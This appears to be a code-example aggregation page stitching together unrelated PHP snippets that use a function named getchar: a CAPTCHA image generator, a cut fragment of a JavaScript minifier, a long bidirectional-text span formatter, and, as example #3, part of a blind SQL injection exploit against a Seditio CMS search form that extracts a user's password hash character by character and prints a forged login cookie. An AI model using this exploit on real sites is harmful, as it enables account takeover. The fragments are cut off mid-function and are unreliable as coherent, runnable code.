Beispiel #1
0
function getcode($num = 4, $type = 0, $is_pix = 0)
{
    //设置
    //$num=4;//验证码长度
    $str = getchar($num, $type);
    $width = 20 * $num;
    $height = 30;
    define("ADD_PIX", $is_pix);
    //是否添加干扰点和干扰线
    $_SESSION['code'] = $str;
    //创建画图板
    $im = imagecreatetruecolor($width, $height);
    //填充背景
    $bg = imagecolorallocate($im, 255, 255, 255);
    imagefill($im, 0, 0, $bg);
    //添加字符串
    for ($i = 0; $i < $num; $i++) {
        $color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
        imagettftext($im, 18, rand(-35, 35), 5 + 18 * $i, 25, $color, "Vera.ttf", $str[$i]);
    }
    /*是否添加干扰线控制*/
    if (ADD_PIX) {
        //添加像素点
        for ($i = 0; $i < 60; $i++) {
            $color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
            imagesetpixel($im, rand(0, $width), rand(0, $height), $color);
        }
        //添加干扰线
        for ($i = 0; $i < 2; $i++) {
            $color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
            imageline($im, rand(0, $width), rand(0, $height), rand(0, $width), rand(0, $height), $color);
        }
        //添加一个矩形框
        $color = imagecolorallocate($im, rand(0, 255), rand(0, 255), rand(0, 255));
        imagerectangle($im, 0, 0, $width - 1, $height - 1, $color);
    }
    //生成图片
    header("content-type:image/jpeg");
    imagejpeg($im);
    //释放图片
    imagedestroy($im);
}
 * javascript code in order to make it run a little faster.
 *
 * @author Peter Fokker <*****@*****.**>
 * @copyright Copyright (C) 2008-2013 Ingenieursbureau PSD/Peter Fokker
 * @license http://websiteatschool.eu/license.html GNU AGPLv3+Additional Terms
 * @version $Id: minjs.php,v 1.1 2013/06/12 14:00:24 pfokker Exp $
 */
$c = '';
$comment = FALSE;
$slash = FALSE;
$slashslash = FALSE;
$asterisk = FALSE;
$line = '';
$quoted = FALSE;
$quote = '';
while (($c = getchar()) !== FALSE) {
    if ($quoted) {
        if ($backslash) {
            $line .= $c;
            $backslash = FALSE;
        } elseif ($c == '\\') {
            $line .= $c;
            $backslash = TRUE;
        } elseif ($c == $quote) {
            $line .= $c;
            $quoted = FALSE;
            $backslash = FALSE;
        } else {
            $line .= $c;
        }
    } else {
Beispiel #3
0
    print "OK\n";
} else {
    die("\n[-] Exploit failed\n");
}
print "    Getting hash...";
$hash = '';
for ($i = 1; $i <= 32; $i++) {
    if (!getchar(">57", $i)) {
        $min = 48;
        $max = 57;
    } else {
        $min = 97;
        $max = 102;
    }
    for ($j = $min; $j <= $max; $j++) {
        if (getchar("+LIKE+{$j}", $i)) {
            $hash .= chr($j);
            break;
        }
    }
}
print "[+] Done! hash - {$hash}\n";
print "[+] Cookie to log in: \nSEDITIO=" . base64_encode($id . ":_:" . $hash . ":_:ice") . "\n";
function getchar($query, $pos, $status = true)
{
    global $host, $path, $prefix, $id;
    if ($status) {
        status();
    }
    $data = "sq=InATeam&frm_sub%5B%5D=9999&sea_frmtitle=1&sea_frmtext=1&sea_pagtitle=1";
    $data .= "&sea_pagdesc=1&sea_pagtext=1&searchin_pag=1&pag_sub%5B%5D=qwerty')";
Beispiel #4
0
/**
 * Finish current span
 */
function finishCurrentSpan(&$result, $theEnd = false)
{
    global $previousState, $currentState, $posSpanStart, $TEXT_DIRECTION, $waitingText;
    global $startLTR, $endLTR, $startRTL, $endRTL, $lenStart, $lenEnd;
    global $numbers, $punctuation;
    $textSpan = substr($result, $posSpanStart);
    $result = substr($result, 0, $posSpanStart);
    // Get rid of empty spans, so that our check for presence of RTL will work
    $result = str_replace(array($startLTR . $endLTR, $startRTL . $endRTL), '', $result);
    // Look for numeric strings that are times (hh:mm:ss).  These have to be separated from surrounding numbers.
    $tempResult = '';
    while ($textSpan != '') {
        $posColon = strpos($textSpan, ':');
        if ($posColon === false) {
            break;
        }
        // No more possible time strings
        $posLRE = strpos($textSpan, WT_UTF8_LRE);
        if ($posLRE === false) {
            break;
        }
        // No more numeric strings
        $posPDF = strpos($textSpan, WT_UTF8_PDF, $posLRE);
        if ($posPDF === false) {
            break;
        }
        // No more numeric strings
        $tempResult .= substr($textSpan, 0, $posLRE + 3);
        // Copy everything preceding the numeric string
        $numericString = substr($textSpan, $posLRE + 3, $posPDF - $posLRE);
        // Separate the entire numeric string
        $textSpan = substr($textSpan, $posPDF + 3);
        $posColon = strpos($numericString, ':');
        if ($posColon === false) {
            // Nothing that looks like a time here
            $tempResult .= $numericString;
            continue;
        }
        $posBlank = strpos($numericString . ' ', ' ');
        $posNbsp = strpos($numericString . '&nbsp;', '&nbsp;');
        if ($posBlank < $posNbsp) {
            $posSeparator = $posBlank;
            $lengthSeparator = 1;
        } else {
            $posSeparator = $posNbsp;
            $lengthSeparator = 6;
        }
        if ($posColon > $posSeparator) {
            // We have a time string preceded by a blank: Exclude that blank from the numeric string
            $tempResult .= substr($numericString, 0, $posSeparator);
            $tempResult .= WT_UTF8_PDF;
            $tempResult .= substr($numericString, $posSeparator, $lengthSeparator);
            $tempResult .= WT_UTF8_LRE;
            $numericString = substr($numericString, $posSeparator + $lengthSeparator);
        }
        $posBlank = strpos($numericString, ' ');
        $posNbsp = strpos($numericString, '&nbsp;');
        if ($posBlank === false && $posNbsp === false) {
            // The time string isn't followed by a blank
            $textSpan = $numericString . $textSpan;
            continue;
        }
        // We have a time string followed by a blank: Exclude that blank from the numeric string
        if ($posBlank === false) {
            $posSeparator = $posNbsp;
            $lengthSeparator = 6;
        } else {
            if ($posNbsp === false) {
                $posSeparator = $posBlank;
                $lengthSeparator = 1;
            } else {
                if ($posBlank < $posNbsp) {
                    $posSeparator = $posBlank;
                    $lengthSeparator = 1;
                } else {
                    $posSeparator = $posNbsp;
                    $lengthSeparator = 6;
                }
            }
        }
        $tempResult .= substr($numericString, 0, $posSeparator);
        $tempResult .= WT_UTF8_PDF;
        $tempResult .= substr($numericString, $posSeparator, $lengthSeparator);
        $posSeparator += $lengthSeparator;
        $numericString = substr($numericString, $posSeparator);
        $textSpan = WT_UTF8_LRE . $numericString . $textSpan;
    }
    $textSpan = $tempResult . $textSpan;
    $trailingBlanks = '';
    $trailingBreaks = '';
    /* ****************************** LTR text handling ******************************** */
    if ($currentState == 'LTR') {
        // Move trailing numeric strings to the following RTL text.  Include any blanks preceding or following the numeric text too.
        if ($TEXT_DIRECTION == 'rtl' && $previousState == 'RTL' && !$theEnd) {
            $trailingString = '';
            $savedSpan = $textSpan;
            while ($textSpan != '') {
                // Look for trailing spaces and tentatively move them
                if (substr($textSpan, -1) == ' ') {
                    $trailingString = ' ' . $trailingString;
                    $textSpan = substr($textSpan, 0, -1);
                    continue;
                }
                if (substr($textSpan, -6) == '&nbsp;') {
                    $trailingString = '&nbsp;' . $trailingString;
                    $textSpan = substr($textSpan, 0, -1);
                    continue;
                }
                if (substr($textSpan, -3) != WT_UTF8_PDF) {
                    // There is no trailing numeric string
                    $textSpan = $savedSpan;
                    break;
                }
                // We have a numeric string
                $posStartNumber = strrpos($textSpan, WT_UTF8_LRE);
                if ($posStartNumber === false) {
                    $posStartNumber = 0;
                }
                $trailingString = substr($textSpan, $posStartNumber, strlen($textSpan) - $posStartNumber) . $trailingString;
                $textSpan = substr($textSpan, 0, $posStartNumber);
                // Look for more spaces and move them too
                while ($textSpan != '') {
                    if (substr($textSpan, -1) == ' ') {
                        $trailingString = ' ' . $trailingString;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    if (substr($textSpan, -6) == '&nbsp;') {
                        $trailingString = '&nbsp;' . $trailingString;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    break;
                }
                $waitingText = $trailingString . $waitingText;
                break;
            }
        }
        $savedSpan = $textSpan;
        // Move any trailing <br>, optionally preceded or followed by blanks, outside this LTR span
        while ($textSpan != '') {
            if (substr($textSpan, -1) == ' ') {
                $trailingBlanks = ' ' . $trailingBlanks;
                $textSpan = substr($textSpan, 0, -1);
                continue;
            }
            if (substr('......' . $textSpan, -6) == '&nbsp;') {
                $trailingBlanks = '&nbsp;' . $trailingBlanks;
                $textSpan = substr($textSpan, 0, -6);
                continue;
            }
            break;
        }
        while (substr($textSpan, -9) == '<LTRbr>') {
            $trailingBreaks = '<br>' . $trailingBreaks;
            // Plain <br> because it’s outside a span
            $textSpan = substr($textSpan, 0, -9);
        }
        if ($trailingBreaks != '') {
            while ($textSpan != '') {
                if (substr($textSpan, -1) == ' ') {
                    $trailingBreaks = ' ' . $trailingBreaks;
                    $textSpan = substr($textSpan, 0, -1);
                    continue;
                }
                if (substr('......' . $textSpan, -6) == '&nbsp;') {
                    $trailingBreaks = '&nbsp;' . $trailingBreaks;
                    $textSpan = substr($textSpan, 0, -6);
                    continue;
                }
                break;
            }
            $waitingText = $trailingBlanks . $waitingText;
            // Put those trailing blanks inside the following span
        } else {
            $textSpan = $savedSpan;
        }
        $savedSpan = $textSpan;
        $trailingBlanks = '';
        $trailingPunctuation = '';
        $trailingID = '';
        $trailingSeparator = '';
        $leadingSeparator = '';
        while ($TEXT_DIRECTION == 'rtl') {
            if (strpos($result, $startRTL) !== false) {
                // Remove trailing blanks for inclusion in a separate LTR span
                while ($textSpan != '') {
                    if (substr($textSpan, -1) == ' ') {
                        $trailingBlanks = ' ' . $trailingBlanks;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    if (substr($textSpan, -6) == '&nbsp;') {
                        $trailingBlanks = '&nbsp;' . $trailingBlanks;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    break;
                }
                // Remove trailing punctuation for inclusion in a separate LTR span
                if ($textSpan == '') {
                    $trailingChar = "\n";
                } else {
                    $trailingChar = substr($textSpan, -1);
                }
                if (strpos($punctuation, $trailingChar) !== false) {
                    $trailingPunctuation = $trailingChar;
                    $textSpan = substr($textSpan, 0, -1);
                }
            }
            // Remove trailing ID numbers that look like "(xnnn)" for inclusion in a separate LTR span
            while (true) {
                if (substr($textSpan, -1) != ')') {
                    break;
                }
                // There is no trailing ')'
                $posLeftParen = strrpos($textSpan, '(');
                if ($posLeftParen === false) {
                    break;
                }
                // There is no leading '('
                $temp = stripLRMRLM(substr($textSpan, $posLeftParen));
                // Get rid of UTF8 control codes
                // If the parenthesized text doesn't look like an ID number,
                // we don't want to touch it.
                // This check won’t work if somebody uses ID numbers with an unusual format.
                $offset = 1;
                $charArray = getchar($temp, $offset);
                // Get 1st character of parenthesized text
                if (strpos($numbers, $charArray['letter']) !== false) {
                    break;
                }
                $offset += $charArray['length'];
                // Point at 2nd character of parenthesized text
                if (strpos($numbers, substr($temp, $offset, 1)) === false) {
                    break;
                }
                // 1st character of parenthesized text is alpha, 2nd character is a digit; last has to be a digit too
                if (strpos($numbers, substr($temp, -2, 1)) === false) {
                    break;
                }
                $trailingID = substr($textSpan, $posLeftParen);
                $textSpan = substr($textSpan, 0, $posLeftParen);
                break;
            }
            // Look for " - " or blank preceding the ID number and remove it for inclusion in a separate LTR span
            $savedSpan = $textSpan;
            if ($trailingID != '') {
                while ($textSpan != '') {
                    if (substr($textSpan, -1) == ' ') {
                        $trailingSeparator = ' ' . $trailingSeparator;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    if (substr($textSpan, -6) == '&nbsp;') {
                        $trailingSeparator = '&nbsp;' . $trailingSeparator;
                        $textSpan = substr($textSpan, 0, -6);
                        continue;
                    }
                    if (substr($textSpan, -1) == '-') {
                        $trailingSeparator = '-' . $trailingSeparator;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    break;
                }
            }
            // Look for " - " preceding the text and remove it for inclusion in a separate LTR span
            $foundSeparator = false;
            $savedSpan = $textSpan;
            while ($textSpan != '') {
                if (substr($textSpan, 0, 1) == ' ') {
                    $leadingSeparator = ' ' . $leadingSeparator;
                    $textSpan = substr($textSpan, 1);
                    continue;
                }
                if (substr($textSpan, 0, 6) == '&nbsp;') {
                    $leadingSeparator = '&nbsp;' . $leadingSeparator;
                    $textSpan = substr($textSpan, 6);
                    continue;
                }
                if (substr($textSpan, 0, 1) == '-') {
                    $leadingSeparator = '-' . $leadingSeparator;
                    $textSpan = substr($textSpan, 1);
                    $foundSeparator = true;
                    continue;
                }
                break;
            }
            if (!$foundSeparator) {
                $textSpan = $savedSpan;
                $leadingSeparator = '';
            }
            break;
        }
        // We're done: finish the span
        $textSpan = starredName($textSpan, 'LTR');
        // Wrap starred name in <u> and </u> tags
        while (true) {
            // Remove blanks that precede <LTRbr>
            if (strpos($textSpan, ' <LTRbr>') !== false) {
                $textSpan = str_replace(' <LTRbr>', '<LTRbr>', $textSpan);
                continue;
            }
            if (strpos($textSpan, '&nbsp;<LTRbr>') !== false) {
                $textSpan = str_replace('&nbsp;<LTRbr>', '<LTRbr>', $textSpan);
                continue;
            }
            break;
        }
        if ($leadingSeparator != '') {
            $result = $result . $startLTR . $leadingSeparator . $endLTR;
        }
        $result = $result . $textSpan . $endLTR;
        if ($trailingSeparator != '') {
            $result = $result . $startLTR . $trailingSeparator . $endLTR;
        }
        if ($trailingID != '') {
            $result = $result . $startLTR . $trailingID . $endLTR;
        }
        if ($trailingPunctuation != '') {
            $result = $result . $startLTR . $trailingPunctuation . $endLTR;
        }
        if ($trailingBlanks != '') {
            $result = $result . $startLTR . $trailingBlanks . $endLTR;
        }
    }
    /* ****************************** RTL text handling ******************************** */
    if ($currentState == 'RTL') {
        $savedSpan = $textSpan;
        // Move any trailing <br>, optionally followed by blanks, outside this RTL span
        while ($textSpan != '') {
            if (substr($textSpan, -1) == ' ') {
                $trailingBlanks = ' ' . $trailingBlanks;
                $textSpan = substr($textSpan, 0, -1);
                continue;
            }
            if (substr('......' . $textSpan, -6) == '&nbsp;') {
                $trailingBlanks = '&nbsp;' . $trailingBlanks;
                $textSpan = substr($textSpan, 0, -6);
                continue;
            }
            break;
        }
        while (substr($textSpan, -9) == '<RTLbr>') {
            $trailingBreaks = '<br>' . $trailingBreaks;
            // Plain <br> because it’s outside a span
            $textSpan = substr($textSpan, 0, -9);
        }
        if ($trailingBreaks != '') {
            $waitingText = $trailingBlanks . $waitingText;
            // Put those trailing blanks inside the following span
        } else {
            $textSpan = $savedSpan;
        }
        // Move trailing numeric strings to the following LTR text.  Include any blanks preceding or following the numeric text too.
        if (!$theEnd && $TEXT_DIRECTION != 'rtl') {
            $trailingString = '';
            $savedSpan = $textSpan;
            while ($textSpan != '') {
                // Look for trailing spaces and tentatively move them
                if (substr($textSpan, -1) == ' ') {
                    $trailingString = ' ' . $trailingString;
                    $textSpan = substr($textSpan, 0, -1);
                    continue;
                }
                if (substr($textSpan, -6) == '&nbsp;') {
                    $trailingString = '&nbsp;' . $trailingString;
                    $textSpan = substr($textSpan, 0, -1);
                    continue;
                }
                if (substr($textSpan, -3) != WT_UTF8_PDF) {
                    // There is no trailing numeric string
                    $textSpan = $savedSpan;
                    break;
                }
                // We have a numeric string
                $posStartNumber = strrpos($textSpan, WT_UTF8_LRE);
                if ($posStartNumber === false) {
                    $posStartNumber = 0;
                }
                $trailingString = substr($textSpan, $posStartNumber, strlen($textSpan) - $posStartNumber) . $trailingString;
                $textSpan = substr($textSpan, 0, $posStartNumber);
                // Look for more spaces and move them too
                while ($textSpan != '') {
                    if (substr($textSpan, -1) == ' ') {
                        $trailingString = ' ' . $trailingString;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    if (substr($textSpan, -6) == '&nbsp;') {
                        $trailingString = '&nbsp;' . $trailingString;
                        $textSpan = substr($textSpan, 0, -1);
                        continue;
                    }
                    break;
                }
                $waitingText = $trailingString . $waitingText;
                break;
            }
        }
        // Trailing " - " needs to be prefixed to the following span
        if (!$theEnd && substr('...' . $textSpan, -3) == ' - ') {
            $textSpan = substr($textSpan, 0, -3);
            $waitingText = ' - ' . $waitingText;
        }
        while ($TEXT_DIRECTION == 'rtl') {
            // Look for " - " preceding <RTLbr> and relocate it to the front of the string
            $posDashString = strpos($textSpan, ' - <RTLbr>');
            if ($posDashString === false) {
                break;
            }
            $posStringStart = strrpos(substr($textSpan, 0, $posDashString), '<RTLbr>');
            if ($posStringStart === false) {
                $posStringStart = 0;
            } else {
                $posStringStart += 9;
            }
            // Point to the first char following the last <RTLbr>
            $textSpan = substr($textSpan, 0, $posStringStart) . ' - ' . substr($textSpan, $posStringStart, $posDashString - $posStringStart) . substr($textSpan, $posDashString + 3);
        }
        // Strip leading spaces from the RTL text
        $countLeadingSpaces = 0;
        while ($textSpan != '') {
            if (substr($textSpan, 0, 1) == ' ') {
                $countLeadingSpaces++;
                $textSpan = substr($textSpan, 1);
                continue;
            }
            if (substr($textSpan, 0, 6) == '&nbsp;') {
                $countLeadingSpaces++;
                $textSpan = substr($textSpan, 6);
                continue;
            }
            break;
        }
        // Strip trailing spaces from the RTL text
        $countTrailingSpaces = 0;
        while ($textSpan != '') {
            if (substr($textSpan, -1) == ' ') {
                $countTrailingSpaces++;
                $textSpan = substr($textSpan, 0, -1);
                continue;
            }
            if (substr($textSpan, -6) == '&nbsp;') {
                $countTrailingSpaces++;
                $textSpan = substr($textSpan, 0, -6);
                continue;
            }
            break;
        }
        // Look for trailing " -", reverse it, and relocate it to the front of the string
        if (substr($textSpan, -2) == ' -') {
            $posDashString = strlen($textSpan) - 2;
            $posStringStart = strrpos(substr($textSpan, 0, $posDashString), '<RTLbr>');
            if ($posStringStart === false) {
                $posStringStart = 0;
            } else {
                $posStringStart += 9;
            }
            // Point to the first char following the last <RTLbr>
            $textSpan = substr($textSpan, 0, $posStringStart) . '- ' . substr($textSpan, $posStringStart, $posDashString - $posStringStart) . substr($textSpan, $posDashString + 2);
        }
        if ($countLeadingSpaces != 0) {
            $newLength = strlen($textSpan) + $countLeadingSpaces;
            $textSpan = str_pad($textSpan, $newLength, ' ', $TEXT_DIRECTION == 'rtl' ? STR_PAD_LEFT : STR_PAD_RIGHT);
        }
        if ($countTrailingSpaces != 0) {
            if ($TEXT_DIRECTION == 'ltr') {
                if ($trailingBreaks == '') {
                    // Move trailing RTL spaces to front of following LTR span
                    $newLength = strlen($waitingText) + $countTrailingSpaces;
                    $waitingText = str_pad($waitingText, $newLength, ' ', STR_PAD_LEFT);
                }
            } else {
                $newLength = strlen($textSpan) + $countTrailingSpaces;
                $textSpan = str_pad($textSpan, $newLength, ' ', STR_PAD_RIGHT);
            }
        }
        // We're done: finish the span
        $textSpan = starredName($textSpan, 'RTL');
        // Wrap starred name in <u> and </u> tags
        $result = $result . $textSpan . $endRTL;
    }
    if ($currentState != 'LTR' && $currentState != 'RTL') {
        $result = $result . $textSpan;
    }
    $result .= $trailingBreaks;
    // Get rid of any waiting <br>
    return;
}